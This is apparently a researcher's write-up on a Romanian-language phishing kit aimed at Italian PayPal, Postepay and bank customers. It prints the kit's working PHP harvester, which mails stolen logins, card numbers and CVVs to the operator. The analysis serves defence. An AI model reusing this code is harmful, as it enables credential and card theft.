What i think is that there is only one guy because if you check the title of this script you see the write assembled by ME, if it was a team should be written Assembled by XYZ team.
Where is he from ?
His mother language is romanian and i think he lives in Italy. As you can see below there are several files written in romanian and the stolen information are sent to a fastweb email that you cannot made if you don't leave in Italy.
- d3b (postepay information stealer)
- stf (cartasi, uk paypal, banca intesa, it paypal, postepay, VISA)
- pastote (cartasi, paypal, VISA, bancopostaclick)
Taking a look to pastote folder we see that he uses a mass mailer script to send phishing emails.
The emails address are stored in 30 rar files named pastoteXX.
From 2/3/2012 he started targetting paypal user but using a different method. I don't have any email of paypal phising but for what there is on this site i can guess that he sends an email saying you have received a bonus of 100 euro, in order to proceed login to your paypal (fake link provided) account and fill the form.
When a victim click on the link will be redirected to this fake page on this site.
Once logged in
Once filled the form and clicked send the data are redirected to a script called trimite.php which translated from romanian means send/forward. This time the data aren't stored in a txt file like previous but directly sent to a fastweb email and in the end redirect the victim to the original site.
$username = $_POST['username']; $password = $_POST['password']; $ip = $_SERVER['REMOTE_ADDR']; $data = date("l, F d, Y h:i" ,time()); $agent = $_SERVER['HTTP_USER_AGENT']; $nome = $_POST['nome']; $cognome = $_POST['cognome']; $c_tip = $_POST['credit_card_type']; $cn = $_POST['cc_number']; $an = $_POST['expdate_year']; $luna = $_POST['expdate_month']; $cvv = $_POST['cvv']; $dob_ziua = $_POST['dob_ziua']; $dob_luna = $_POST['dob_luna']; $dob_an = $_POST['dob_an']; $address1 = $_POST['adresa']; $zip = $_POST['cod_postal']; $city = $_POST['oras']; $state = $_POST['provincie']; //---Email---// $email = "--firstname.lastname@example.org"; $subiect = "$ip:$username:$password"; $headers = 'MIME-Version: 1.0' . "\r\n"; $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n"; $mesaj_html ="
Indirizzo email $username Password PayPal $password
Nome $nome Gnome $cognome Data di nascita: $dob_ziua:$dob_luna:$dob_an(ziua:luna:an)
Indirizzo $address1 CAP $zip Città $city Provincia $state
Tipo di carta di credito $c_tip Numero della carta di credito $cn Data di scadenza $luna/$an Codice di sicurezza della carta $cvv
"; mail($email, $subiect, $mesaj_html, $headers); header("Location: http://www.paypal.it");
IP $ip Data $data Browser $agent
He did a good job to replicate paypal login process.
In the stf folder all stolen data are sent to email@example.com and the techniques used to trick users are the same explained previously.
Folder index file.